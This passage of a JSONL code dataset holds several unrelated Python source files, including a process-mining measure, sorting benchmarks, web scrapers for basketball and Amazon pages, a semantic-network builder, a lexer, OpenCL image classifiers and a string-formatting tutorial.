\"non-silent\" transitions\n transitions = [x for x in ocpn.transitions if not x.silent]\n # dictionary to store each activity as key and a list of its prior states/places as value\n targets = {}\n # get a list of all activities that have been performed in the log\n log = ocel.log.log.event_activity\n for arc in tqdm(ocpn.arcs, desc=\"Check the arcs\"):\n # for each arc, check if our target is a valid (non-silent) transition\n if arc.target in transitions:\n # load all the prior places of a valid transition into a dictionary, where the key is the transition and the value\n # a list of all directly prior places\n if arc.target.name in targets:\n targets[arc.target.name].append(arc.source.name)\n else:\n targets[arc.target.name] = [arc.source.name]\n #get the list of all possible states for our model\n states = list(targets.values())\n #get the list of all possible keys in our targets dictionary\n keys_list = list(targets.keys())\n #define a counting variable for the number of states\n i = 0\n # for each valid transition/event -> for computing reasons(efficiency), we work with a small difference to above\n for state in tqdm(states, desc=\"Save the states\"):\n # create an empty list where we can store all enabled transitions in the specific prior state\n enabled= []\n #define an empty string that should hold the name of the event we are currently investigating\n event_name = keys_list[i]\n # get the list of all events that are simultaneously in the current state\n for key in targets:\n # we check if the value is the same as the state or if the value of another key is a subset, because then it is also enabled\n if (state == targets[key]) or (set(targets[key]).issubset(set(state))):\n enabled.append(key)\n\n # number of activities that happened in the state\n w = len(enabled)\n # number of times this state has visited in the log\n n = len(log[log.isin(enabled)])\n # number of times this state was visited in the log\n freq = len(log[log == event_name])\n #print(w) #used for debugging\n #print(n) #used for debugging\n #print(freq) #used for debugging\n if n >= w+2 :\n pnew.append(freq*(w*(w+1))/(n*(n-1)))\n else:\n pnew.append(freq*1)\n #increase the counting variable\n i += 1\n #derive the final generalization value\n return np.round((1 - 
np.sum(pnew)/len(states)),4)","repo_name":"NiklasSabel/Generalization_in_Object_Centric_Process_Mining","sub_path":"models/alignment_measure.py","file_name":"alignment_measure.py","file_ext":"py","file_size_in_byte":7553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"35963616826","text":"\n'''\n    This is the full code for taking the timings.\n    It measures execution time using the time.time() method in python and\n    uses random arrays (built with random()) as input to the algorithms, which sort into\n    ascending order\n'''\n\nimport time\nimport random\n\n\nrandom.seed()\n\n\n#test cases, enable what you want\n# This will generate 10000 numbers in the range 1-1000000\n#mylist=[random.randint(5,5) for i in range (2)] # you can change the number of elements here\n#mylist=sorted(mylist, key=int, reverse=True) # input a descending order list\n#mylist=sorted(mylist) # input the ascending order list\nmylist=[]\n#print(mylist)\nmylist1=list(mylist) # temporary variables\nmylist2=list(mylist)\n\nstart=time.time()\ndef bubble_sort(mylist):\n    length=len(mylist)\n    for i in range (length-1,0,-1): # reverse for loop to reduce the length one by one\n        #check the max and swap each of them\n        for j in range (0,i): # 0 to n-2\n            if mylist[j+1]<mylist[j]:\n                mylist[j],mylist[j+1]=mylist[j+1],mylist[j] # swap neighbours that are out of order\n\nbubble_sort(mylist1)\nend=time.time()\n\nelapsedtime=end-start\nprint(\"Bubble sort\")\nprint(\"time(ms) : %0.5f\"% (1000*elapsedtime))\nprint()\n\nstart=time.time()\ndef insertion_sort(mylist):\n    for i in range(1,len(mylist)):\n        current=mylist[i] # element to insert into the sorted prefix\n        j=i\n        while j>0 and mylist[j-1]>current:\n            mylist[j]=mylist[j-1] # shifting\n            j=j-1 # shifting back direction\n\n        mylist[j]=current\n    \n\ninsertion_sort(mylist)\nend =time.time()\n\nelapsedtime=end-start\nprint(\"Insertion sort\")\nprint(\"time(ms) : %0.5f\"% (1000*elapsedtime))\nprint()","repo_name":"MalithaDilshan/Data-Structures-and-Algorithms","sub_path":"Sorting/Timing Analize(simple)/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"24492127968","text":"from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nfrom tqdm import tqdm\n\ndef get_season_data():\n    \"\"\" Extract table contents and player details in order to create a\n    list of dataframes for batching and saving into CSVs \"\"\"\n\n    url = \"https://www.basketball-reference.com\"\n    season_list = create_player_season_list()\n    df_list = []\n    counter = 0\n\n    for season in tqdm(season_list,desc=\"Extracting season data…\",):\n        details = []\n        link = url + season\n\n        raw_html = requests.get(link).text\n        soup = BeautifulSoup(raw_html, 
'lxml')\n\n table = soup.find('table', {'id':'per_game'})\n for tr in table.find_all('tr'):\n try:\n tr_text = tr.find('a').get('href')\n if tr_text[1:8] == 'players':\n per_game_list.append(tr_text)\n except:\n continue\n\n return per_game_list\n\n\ndef create_player_href_list():\n \"\"\" Create a list of links by player href that will get me to\n individual player page\"\"\"\n\n link_list = create_link_list()\n\n href_list = []\n\n for link in tqdm(link_list,desc=\"Extracting player links…\",):\n\n raw_html = requests.get(link).text\n soup = BeautifulSoup(raw_html, 'lxml')\n\n table = soup.find('table', {'id':'players'})\n for strong in table.find_all('strong'):\n href_list.append(strong.find('a').get('href'))\n\n return href_list\n\n\ndef create_link_list():\n \"\"\" Create a list of links by letter that will get me to href\n page for individual players \"\"\"\n\n url = \"https://www.basketball-reference.com/players/\"\n letters = ['A','B','C','D','E','F','G','H','I','J','K',\n 'L','M','N','O','P','Q','R','S','T','U','V',\n 'W','X','Y','Z',]\n\n link_list = []\n\n for letter in letters:\n link_list.append(url+letter.lower())\n\n return link_list\n\n\nif __name__ == '__main__':\n get_season_data()\n","repo_name":"Bkukov/nba_scraper","sub_path":"scrape_raw.py","file_name":"scrape_raw.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30432296290","text":"#!/usr/bin/env python\n\n\"\"\" Test or train global embedding on the breakfast with unknown high-level activity classes\n\"\"\"\n\n__author__ = 'Anna Kukleva'\n__date__ = 'July 2020'\n\nimport sys\nimport os\nsys.path.append(os.path.abspath('.').split('data_utils')[0])\n\nfrom ute.utils.arg_pars import opt\nfrom data_utils.BF_utils.update_argpars import update\nfrom ute.global_corpus import run_pipeline\n\nif __name__ == '__main__':\n opt.global_pipe = True\n opt.subaction = 'global'\n\n # set root\n opt.dataset_root = '/BS/kukleva/work/data/bf/fv'\n\n # global parameters\n opt.global_K = 5\n opt.global_k_prime = 10\n\n # set feature extension and dimensionality\n opt.ext = 'txt'\n opt.feature_dim = 64\n\n # model name can be 'mlp' or 'nothing' for no embedding (just raw features)\n opt.model_name = 'mlp'\n\n # load an already trained model (stored in the models directory in dataset_root)\n opt.load_model = True\n # opt.loaded_model_name = 'global.pth.tar'\n opt.loaded_model_name = 'global%d_%d.pth.tar' % (opt.global_K, opt.global_k_prime)\n\n # update log name and absolute paths\n update()\n\n run_pipeline()\n\n","repo_name":"Annusha/unsup_temp_embed","sub_path":"data_utils/BF_utils/bf_global.py","file_name":"bf_global.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"35"} +{"seq_id":"27005335788","text":"'''\nTools for building and analyzing a semantic network starting from\na list of lists of text\n\nAuthor: Matthew A Turner\nDate: 9 January 2017\n'''\nimport networkx as nx\n\nfrom numpy import array, zeros, log, flipud, power\nfrom numpy.linalg import norm\nfrom nltk.corpus import stopwords\nfrom sklearn.utils.extmath import randomized_svd\nfrom sklearn.preprocessing import normalize\n\nSTOPWORDS = stopwords.words('english')\n\n\nclass LookupCount:\n def __init__(self, index):\n self.index = index\n self.count = 1\n\n\n# we first need to iterate through the texts to find $f_q(x, y)$\n# for all $x$ and $y$\ndef _calculate_ppmi(texts, 
window_distance, alpha,\n verbose=False, saveroot='ppmi_calculation'):\n '''\n\n '''\n word_lookup_counts = {}\n context_lookup_counts = {}\n word_idx = 0\n\n # step 1) individual word counts and joint word/context counts\n for idx, text in enumerate(texts):\n if verbose:\n print('on text {} out of {} calculating PPMI matrix'.format(\n idx, len(texts)\n )\n )\n for ii, word in enumerate(text):\n\n # handle single-word frequency\n if word not in word_lookup_counts:\n word_lookup_counts.update({word: LookupCount(word_idx)})\n word_idx += 1\n else:\n word_lookup_counts[word].count += 1\n\n # determine f_q(x, y)\n # first, window indices\n w1 = ii + 1\n w2 = w1 + window_distance\n for context in text[w1:w2]:\n if (word, context) not in context_lookup_counts:\n context_lookup_counts.update({(word, context): 1})\n else:\n context_lookup_counts[(word, context)] += 1\n\n # now look previous\n if ii > 0:\n w = max(ii - window_distance, 0)\n for context in text[w:ii]:\n if (word, context) not in context_lookup_counts:\n context_lookup_counts.update({(word, context): 1})\n else:\n context_lookup_counts[(word, context)] += 1\n\n # step 2) process word and joint counts to calculate PPMI matrix\n\n N = len(word_lookup_counts.items())\n norm_coeff = 1.0 / N\n\n # context smoothing \"alleviates bias towards rare words\"\n # Levy, O., Goldberg, Y., & Dagan, I. (2015).\n # Transactions of the Association for Computational Linguistics, 3, 211–225\n scaled_context_vec = power(\n array([v.count for v in word_lookup_counts.values()]),\n alpha\n )\n scaled_context_norm_coeff = 1.0 / norm(scaled_context_vec)\n\n ppmi_matrix = zeros((N, N))\n\n word_context_pairs = set(context_lookup_counts.keys())\n\n pairs_lookup = {}\n for wc_pair in word_context_pairs:\n word = wc_pair[0]\n if word in pairs_lookup:\n pairs_lookup[word].append(wc_pair)\n else:\n pairs_lookup.update({word: [wc_pair]})\n\n for word, lookup_count in word_lookup_counts.items():\n\n i = lookup_count.index\n P_word = norm_coeff * lookup_count.count\n\n relevant_pairs = pairs_lookup[word]\n\n for pair in relevant_pairs:\n\n context = pair[1]\n context_wlc = word_lookup_counts[context]\n\n j = context_wlc.index\n\n P_context = \\\n scaled_context_norm_coeff * pow(context_wlc.count, alpha)\n\n P_joint = norm_coeff * context_lookup_counts[pair]\n\n pmi_val = log(P_joint / (P_context * P_word))\n\n ppmi_matrix[i, j] = pmi_val if pmi_val > 0 else 0\n\n return word_lookup_counts, context_lookup_counts, ppmi_matrix\n\n\ndef calculate_edgeweights(embedding_mat):\n\n normed_embeddings = normalize(embedding_mat, norm='l2', axis=1)\n\n # return arccos(-normed_embeddings.dot(normed_embeddings.T))\n return normed_embeddings.dot(normed_embeddings.T)\n\n\n# TODO these variable names are bad: word index and word lookup...\ndef get_knn(word, edgeweight_mat, k, word_index_counts, word_lookup_table):\n word_idx = word_index_counts[word].index\n\n # get similarity vector from the edgeweight matrix\n word_sim_vec = edgeweight_mat[word_idx]\n k_best_indices = flipud(word_sim_vec.argsort())[:k]\n\n return [\n ((word, word_lookup_table[nn_idx]), edgeweight_mat[word_idx, nn_idx])\n for nn_idx in k_best_indices\n ]\n\n\nclass Embedding:\n\n matrix = None\n edgeweight_mat = None\n\n # we'll need to look up words by their indices and vice versa\n word_lookup_counts = None\n word_lookup = None\n index_lookup = None\n\n def __init__(self, matrix, word_lookup, index_lookup, U_full=None):\n '''\n Arguments:\n matrix (numpy.array): reduced U from SVD\n graph (networkx.Graph): k-nn 
graph representation of embeddings\n word_lookup (dict): (word, index) pairs for reverse lookups\n index_lookup (dict): (index, word) pairs for word lookups in matrix\n '''\n self.matrix = matrix\n self.word_lookup = word_lookup\n self.index_lookup = index_lookup\n\n @classmethod\n def from_ppmi(cls, ppmi, embedding_dim=300):\n\n word_lookup_counts = ppmi.word_lookup_counts\n\n word_lookup = {k: v.index for k, v in word_lookup_counts.items()}\n index_lookup = _index_lookup_table(word_lookup_counts)\n\n embeddings, _, _ = randomized_svd(ppmi.matrix, embedding_dim)\n\n new_embedding = cls(embeddings, word_lookup, index_lookup)\n\n new_embedding.word_lookup_counts = word_lookup_counts\n\n return new_embedding\n\n def make_edgeweight_mat(self):\n\n if self.matrix is None:\n raise RuntimeError('Must first create embedding matrix')\n\n self.edgeweight_mat = calculate_edgeweights(self.matrix)\n\n def generate_graph(self, k, words=None):\n\n if self.edgeweight_mat is None:\n self.edgeweight_mat = calculate_edgeweights(self.matrix)\n\n return make_graph(self.edgeweight_mat, k, self.word_lookup_counts,\n self.index_lookup, words=words)\n\n\nclass SemanticNetwork:\n\n def __init__(self, *args):\n return None\n\n\nclass PPMI:\n\n matrix = None\n word_lookup_counts = None\n\n def __init__(self, matrix, word_lookup_counts):\n self.matrix = matrix\n self.word_lookup_counts = word_lookup_counts\n\n @classmethod\n def from_texts(cls, texts, window_length=4, alpha=1.0, verbose=False):\n\n word_lookup_counts, _, matrix = \\\n _calculate_ppmi(texts, window_length, alpha, verbose=verbose)\n\n return cls(matrix, word_lookup_counts)\n\n\ndef make_graph(edges, k, word_index_counts, word_lookup_table, words=None):\n\n if words is None:\n words = word_index_counts.keys()\n\n G = nx.Graph()\n G.add_nodes_from(words)\n\n for i, word in enumerate(words):\n print('on word {} out of {}'.format(i, len(words)))\n try:\n knn = get_knn(word, edges, k, word_index_counts, word_lookup_table)\n # ignore weights for now\n G.add_edges_from([e[0] for e in knn])\n except KeyError:\n print('word {} not found'.format(word))\n\n return G\n\n\ndef _index_lookup_table(word_index_counts):\n\n return dict((wic.index, word) for word, wic in word_index_counts.items())\n\n\ndef build_network(texts, alpha=0.75, verbose=False):\n\n if verbose:\n print('building PPMI matrix')\n ppmi = PPMI.from_texts(texts, alpha=alpha)\n\n if verbose:\n print('calculating embedding via randomized SVD')\n embedding = Embedding.from_ppmi(ppmi)\n\n if verbose:\n print('calculating edgeweight matrix')\n embedding.make_edgeweight_mat()\n\n return ppmi, embedding\n","repo_name":"mt-digital/semantic-cable","sub_path":"build_network.py","file_name":"build_network.py","file_ext":"py","file_size_in_byte":7732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"43067231553","text":"import re\nimport sys\n\n#----------------------------\ndef counter():\n '''\n :return: a generator for counting\n '''\n\n i = 0\n while True:\n yield i\n i = i + 1\n\n\nclass Lexer(object):\n '''\n Our Lexer class for classifying tokens.\n '''\n\n # list of token constants\n cnt = counter()\n FILE_NOT_FOUND_ERROR = next(cnt)\n PLUS = next(cnt)\n LPAREN = next(cnt)\n RPAREN = next(cnt)\n INTLIT = next(cnt)\n FLOATLIT = next(cnt)\n BOOL = next(cnt)\n ID = next(cnt)\n EQ_EQ = next(cnt)\n EQ = next(cnt)\n MINUS = next(cnt)\n TIMES = next(cnt)\n DIV = next(cnt)\n OR = next(cnt)\n AND = next(cnt)\n NEQ = next(cnt)\n LTEQ = next(cnt)\n LT = 
next(cnt)\n GTEQ = next(cnt)\n GT = next(cnt)\n MOD = next(cnt)\n NOT = next(cnt)\n SEMI = next(cnt)\n COM = next(cnt)\n LCBRACK = next(cnt)\n RCBRACK = next(cnt)\n LBRACK = next(cnt)\n RBRACK = next(cnt)\n REALNUM = next(cnt)\n STR = next(cnt)\n KEY = next(cnt)\n PRINT = next(cnt)\n IF = next(cnt)\n WHILE = next(cnt)\n INT = next(cnt)\n FLOAT = next(cnt)\n MAIN = next(cnt)\n ELSE = next(cnt)\n TRUELIT = next(cnt)\n FALSELIT = next(cnt)\n POWER = next(cnt)\n END_OF_FILE = next(cnt)\n\n\n # token dictionary for punctuation and operators\n td = {\n '+' : PLUS,\n '==': EQ_EQ,\n '=' : EQ,\n '(' : LPAREN,\n ')' : RPAREN,\n '-' : MINUS,\n '#' : POWER,\n '*' : TIMES,\n '/' : DIV,\n '||': OR,\n '&&': AND,\n '!=': NEQ,\n '<=': LTEQ,\n '<' : LT,\n '>=': GTEQ,\n '>' : GT,\n '%' : MOD,\n '!' : NOT,\n ';' : SEMI,\n ',' : COM,\n '{' : LCBRACK,\n '}' : RCBRACK,\n '[' : LBRACK,\n ']' : RBRACK,\n 'intlit' : INTLIT,\n 'floatlit' : FLOATLIT,\n 'true' : TRUELIT,\n 'false' : FALSELIT,\n 'int' : INT,\n 'float' : FLOAT,\n 'main' : MAIN,\n 'bool' : BOOL,\n 'key' : KEY,\n 'id' : ID,\n 'while' : WHILE,\n 'if' : IF,\n 'print' : PRINT,\n 'End of File' : END_OF_FILE\n }\n\n # Map from token values to token names\n name = {\n '+': \"PlUS\",\n '==': \"EQ-EQ\",\n '=' : 'EQUAL',\n '(': 'LPAREN',\n ')' : 'RPAREN',\n '-': 'MINUS',\n '#' : 'POWER',\n '*' : 'TIMES',\n '/' : 'DIVIDE',\n '||' : 'OR',\n '&&' : 'AND',\n '!=' : 'NEQ',\n '<' : 'LT',\n '<=' : 'LEQ',\n '>' : 'GT',\n '>=' : 'GEQ',\n '%' : 'MOD',\n '!' : 'NOT',\n ';' : 'SEMI',\n ',' : 'COMMA',\n '{' : 'LBRACE',\n '}' : 'RBRACE',\n '[' : 'LBRACK',\n ']' : 'RBRACK'\n }\n\n # regex patterns for splitting a line\n split_patt = re.compile(\n '''\n \\s | # whitespace\n (\".*?\") | # String\n (\"\\@\") | # Comment\n (\\() | # left paren\n (\\)) | # right paren\n (\\+) | # plus\n (\\-) | # minus\n (\\{) | # left brace\n (\\}) | # right brace\n (\\,) | # comma\n (\\=\\=)| # equal comparator\n (\\=) | # equal\n (\\*) | # times\n (\\|\\|) | # or\n (\\&\\&) | # and\n (\\/) | # divide\n (\\!\\=) | # not equal\n (\\<\\=) | # less than or equal to\n (\\<) | # less than\n (\\>\\=) | # greater than or equal to\n (\\>) | # greater than\n (\\%) | # mod\n (\\!) 
| # not\n (\\;) | # colon\n (\\[) | # left bracket\n (\\]) # right bracket\n ''', re.VERBOSE)\n\n # regex for an identifier\n id_patt = re.compile(\"^[a-zA-Z_]\\w*$\")\n\n # regex for an integer\n int_patt = re.compile(\"^\\d+$\")\n\n # regex for a real number\n real_patt = re.compile(\"^\\d+\\.\\d+$\")\n\n #regex for string\n str_patt = re.compile('\\\"(.+?)\\\"')\n\n # regex for comment\n com_patt = re.compile(\"@\")\n\n # regex for keyword\n key_patt = re.compile(\"^bool$|^else$|^false$|^if$|^true$|^float$|^int$|^while$|^print$\")\n\n\n def token_generator(self,filename):\n '''\n Our token generator.\n :param filename: name of course program file\n :return: a generator\n '''\n try:\n file = open(filename)\n except IOError:\n print(\"File \"+ filename+ \" not found\")\n yield (Lexer.FILE_NOT_FOUND_ERROR, \"Cannot open file\")\n sys.exit()\n\n count = counter()\n lineNumber = next(count)\n # for every line in the file\n for line in file:\n line = line.replace(\"//\", '@')\n line = line.replace(\"**\", '#')\n # split a line based on our split pattern and filter\n # all of the empty strings and None values.\n tokens = Lexer.split_patt.split(line)\n tokens = [x for x in tokens if x]\n\n # for each possible token in the line\n for tok in tokens:\n v = Lexer.td.get(tok, False)\n if v:\n yield (Lexer.td[tok], tok, lineNumber+1)\n elif Lexer.key_patt.search(tok):\n yield (Lexer.td['key'], tok, lineNumber+1)\n elif Lexer.id_patt.search(tok):\n yield (Lexer.td['id'], tok, lineNumber+1)\n elif Lexer.int_patt.search(tok):\n yield (Lexer.td['intlit'], tok, lineNumber+1)\n elif Lexer.real_patt.search(tok):\n yield (Lexer.td['floatlit'], tok, lineNumber+1)\n elif Lexer.str_patt.search(tok):\n tok = tok.replace('@', '//')\n yield (Lexer.td[tok], tok, lineNumber + 1)\n elif Lexer.com_patt.search(tok):\n break\n else:\n yield (\"Unrecognized character\", str(tok), \"on line \" + str(lineNumber+1))\n lineNumber += 1\n\n #while True:\n yield (Lexer.END_OF_FILE, Lexer.END_OF_FILE, Lexer.END_OF_FILE)\n","repo_name":"tjpell/C-Lite","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35731787160","text":"from dataclasses import dataclass\nfrom pymongo import MongoClient\nimport os, sys\n\n@dataclass\nclass EnvironmentVariable:\n mongo_db_url:str = os.getenv(\"MONGO_DB_URL\")\n\n\nenv_var = EnvironmentVariable()\nmongo_client = MongoClient(env_var.mongo_db_url)\n\nTARGET_COLUMN = \"Rating\"\nPREDICTOR_FLOAT_COLUMN = \"Average Cost for two\"\nPREDICTOR_INT_CLOUMNS_LIST = [\"Votes\", \"Price range\"]\nPREDICTOR_CATEGORICAL_COLUMNS_LIST = ['Has Table booking','Has Online delivery']\nPREDICTOR_COLUMNS_LIST = ['Votes','Average Cost for two','Has Table booking','Has Online delivery','Price range']\nREQUIRED_CLOUMNS_LIST = ['Votes','Average Cost for two','Has Table booking','Has Online delivery','Price range','Rating']\n","repo_name":"rahulchatt26/restraunt-rating-prediction","sub_path":"restaurant/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10089819552","text":"from django.conf.urls import url\n\nfrom . 
import views\n\nurlpatterns = [\n    url(r'^$', views.index, name='index'),\n    url(r'^move/?$',views.move,name='move'),\n    url(r'^update_beacon/?$',views.update_beacon,name='update_beacon'),\n    url(r'^update_direction/?$',views.update_direction,name='update_direction'),\n]","repo_name":"sandeep6189/bezirk-hackathon","sub_path":"berzik_golf/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"29241745299","text":"s = 'Строковый тип'\ndef view_list(*args):\n    print()\n    for a_s in args:\n        print(a_s)\n\nview_list('Понедельник','Вторник','Среда','Четверг','Пятница','Суббота','Воскресенье')\nview_list(1,2,3,4,5,6,7,8,9,10,11,12,13,14,15)\nview_list('Север',2020,200.5,True,'Арбуз')\n\ndef view_n_list(**kwargs):\n    print()\n    for key, val in kwargs.items():\n        print(key,': [',val,']')\n\nview_n_list(brand='Sony',year=2018,price=1000.50)\n\nvacuum_cleaner_brand = 'AnyName'\ndiscount = 0.15\nprice = 10000.00\nprint('На пылесосы {0} действует скидка {1}% Стоимость пылесоса со скидкой: {2}'.\n      format(vacuum_cleaner_brand,\n             round(discount*100),\n             price*(1-discount)))\n\ns = 'Строка'\nn = 12345\nf = 200.55\nb = True\nfull_str = 'булев: {3}, строковый: {0}, дробный: {2}, целочисленный: {1}'.format(s,n,f,b)\nprint(full_str)\n\nprint('{0}, {0}, {0}, {0}, {0}'.format(123))\nprint('{}, {}, {}, {}, {}'.format(1,2,'Три',True,'Пять'))\nprint('{}{}'.format('Строка1','Строка2'))\n\n\nprint()\n# formatting a matrix of powers of numbers\nfor i in range(1,11):\n    for j in range(1,11):\n        print('{:>12}'.format(i**j),end=('\\\n',' ')[j<10])\n\nprint('десятичный:{0:d}\\\nдвоичный:{0:b}\\\n8-ричный:{0:o}\\\n16-ричный:{0:X}\\\nс плавающей точкой:{0:10.2f}'.format(32767))\n\n# calculating take-home pay after tax\nincome = 50000.00 # amount before tax is deducted\ntax = 0.13 # tax rate\namount_in_hand = income * (1.0-tax)\n\nprint('\\\nДоход: {:,.2f}\\\nНалог: {:.2%}\\\nСумма на руки: {:,.2f}'.format(income,tax,amount_in_hand))\n\n# multiplication table\nhorizontal_line = '-'*73\nprint('\\\n{:^73}\\\n'.format('Таблица умножения'))\n# building the rows\nfor i in range(0,11):\n    # building a single row\n    for j in range(0,11):\n        # one loop iteration builds one cell of the table\n        if (i==0):\n            # building the header row with the column numbers\n            print(('{:>6}'.format(j), ' '*3)[j == 0], end=('\\\n', ' ')[j < 10])\n        else:\n            if (j > 0):\n                # building the cell for the product of the row number and the column number\n                print('{:>6}'.format(j*i),end=('\\\n', ' ')[j < 10])\n            else:\n                # building the next row number in the left-hand column\n                print('{:>2}'.format(i), end=' ')\n    if (i == 0):\n        # top separator line\n        print(horizontal_line)\n# bottom separator line\nprint(horizontal_line)\n","repo_name":"AlchiProMent/PyBeginner","sub_path":"02_ClassesAndObjects/strObj.py","file_name":"strObj.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"13545864211","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport csv\nfrom datetime import datetime\n\n\nquote_page = 'https://www.amazon.in/BassHeads-225-Super-Extra-Headphones/dp/B01M9C51T9/ref=zg_bs_electronics_6?_encoding=UTF8&psc=1&refRID=8ZQC04R246AH7877MFZD'\npage= urlopen(quote_page)\nsoup = BeautifulSoup(page,'html.parser')\nProduct_title = soup.find('span', 
attrs={'class':'a-size-large'})\ntitle=Product_title.text.strip()\n\n\nprint(title)\ndataArr = [title]\n\nwith open('index.csv', 'a') as csvFile:\n writer = csv.writer(csvFile)\n writer.writerow(dataArr)\n#sys.exit()\ncsvFile.close()\n","repo_name":"ankit1812/python_scrapping","sub_path":"amazonData.py","file_name":"amazonData.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23863160273","text":"import numpy as np\nimport pyopencl as cl\n\n\nclass BaseClassifier:\n def __init__(self, program_file, minimize, descriptors_dict, dev_idx=-1):\n self.platform = cl.get_platforms()[0]\n self.context = cl.Context([self.platform.get_devices()[dev_idx]])\n self.program = cl.Program(self.context, open(program_file).read()).build()\n self.cl_descriptors = {costume: [cl.image_from_array(self.context, de, 4, mode='r') for de in des]\n for costume, des in descriptors_dict.items()}\n self.queue = cl.CommandQueue(self.context)\n self.minimize = minimize\n\n def predict(self, sample_set):\n cl_sample_set = [cl.image_from_array(self.context, sample, 4, mode='r')\n if sample is not None else None for sample in sample_set]\n\n # predict score of each sample, mean of every color channel summed up over all cutouts\n # numpy's float32 is not serializable, thus, cast to python native float\n return {costume_id: float(np.sum(\n [np.mean(self.distance(des[i // 2], sample)) for i, sample in enumerate(cl_sample_set) if sample is not None]))\n for costume_id, des in self.cl_descriptors.items()}\n\n\nclass MseClassifier(BaseClassifier):\n KERNEL_PATH = 'resources/kernels/mean_squared_error.opencl'\n\n def __init__(self, descriptors_dict, dev_idx=-1):\n super().__init__(MseClassifier.KERNEL_PATH, True, descriptors_dict, dev_idx)\n\n def distance(self, cl_target, cl_query):\n out_dims = (cl_query.shape[0] // 4) * 2 + 1, (cl_query.shape[1] // 4) * 2 + 1\n dest = cl.Image(self.context, cl.mem_flags.WRITE_ONLY,\n cl.ImageFormat(cl.channel_order.RGBA, cl.channel_type.FLOAT),\n shape=(out_dims[0], out_dims[1], 11))\n self.program.mse(self.queue, dest.shape, None,\n cl_target, np.array(cl_target.shape, dtype=np.int32),\n cl_query, np.array(cl_query.shape, dtype=np.int32),\n dest, np.array(dest.shape[:2], dtype=np.int32)).wait()\n out = np.empty((11, dest.shape[1], dest.shape[0], 4), dtype=np.float32)\n cl.enqueue_copy(self.queue, out, dest, origin=(0, 0), region=dest.shape)\n distance_space = out[:, :, :, :3]\n\n reduced_distance_space = np.nansum(distance_space, axis=3)\n rot_i, ty_i, tx_i = np.unravel_index(np.nanargmin(reduced_distance_space), reduced_distance_space.shape)\n return distance_space[rot_i, ty_i, tx_i]\n\n def __str__(self):\n return 'Mean Squared Error classifier, number of classes: %s' % len(self.cl_descriptors)\n \n\nclass CcClassifier(BaseClassifier):\n KERNEL_PATH = 'resources/kernels/correlation_coefficient.opencl'\n\n def __init__(self, descriptors_dict, dev_idx=-1):\n super().__init__(CcClassifier.KERNEL_PATH, False, descriptors_dict, dev_idx)\n\n def distance(self, cl_target, cl_query):\n out_dims = (cl_query.shape[0] // 4) * 2 + 1, (cl_query.shape[1] // 4) * 2 + 1\n img1avg = cl.Image(self.context, cl.mem_flags.READ_WRITE,\n cl.ImageFormat(cl.channel_order.RGBA, cl.channel_type.FLOAT),\n shape=(out_dims[0], out_dims[1], 11))\n img2avg = cl.Image(self.context, cl.mem_flags.READ_WRITE,\n cl.ImageFormat(cl.channel_order.RGBA, cl.channel_type.FLOAT),\n shape=(out_dims[0], out_dims[1], 11))\n corrco = 
cl.Image(self.context, cl.mem_flags.WRITE_ONLY,\n cl.ImageFormat(cl.channel_order.RGBA, cl.channel_type.FLOAT),\n shape=(out_dims[0], out_dims[1], 11))\n self.program.avg(self.queue, img1avg.shape, None,\n cl_target, np.array(cl_target.shape, dtype=np.int32),\n cl_query, np.array(cl_query.shape, dtype=np.int32),\n img1avg, img2avg, np.array(img1avg.shape[:2], dtype=np.int32)).wait()\n self.program.corr(self.queue, img1avg.shape, None,\n cl_target, np.array(cl_target.shape, dtype=np.int32),\n cl_query, np.array(cl_query.shape, dtype=np.int32),\n img1avg, img2avg, corrco, np.array(img1avg.shape[:2], dtype=np.int32)).wait()\n out = np.empty((11, img2avg.shape[1], img2avg.shape[0], 4), dtype=np.float32)\n cl.enqueue_copy(self.queue, out, corrco, origin=(0, 0), region=img2avg.shape)\n distance_space = out[:, :, :, :3]\n\n reduced_distance_space = np.nansum(distance_space, axis=3)\n rot_i, ty_i, tx_i = np.unravel_index(np.nanargmax(reduced_distance_space), reduced_distance_space.shape)\n return distance_space[rot_i, ty_i, tx_i]\n\n def __str__(self):\n return 'Correlation Coefficient classifier, number of classes: %s' % len(self.cl_descriptors)\n","repo_name":"RTiK/swiss-traditional-costume-classification","sub_path":"classifiers.py","file_name":"classifiers.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"22663094744","text":"class Solution(object):\n\tdef moveZeroes(self, nums):\n\t\t\"\"\"\n\t\t:type nums: List[int]\n\t\t:rtype: void Do not return anything, modify nums in-place instead.\n\t\t\"\"\"\n\t\tif not nums:\n\t\t\treturn nums\n\t\t\n\t\tleft = 0\n\t\tright = 0\n\n\t\twhile right < len(nums):\n\t\t\twhile right < len(nums) and nums[right] == 0:\n\t\t\t\tright += 1\n\t\t\tif right == len(nums):\n\t\t\t\tbreak\n\t\t\tnums[left] = nums[right]\n\t\t\tleft += 1\n\t\t\tright += 1\n\t\twhile left < len(nums):\n\t\t\tnums[left] = 0\n\t\t\tleft += 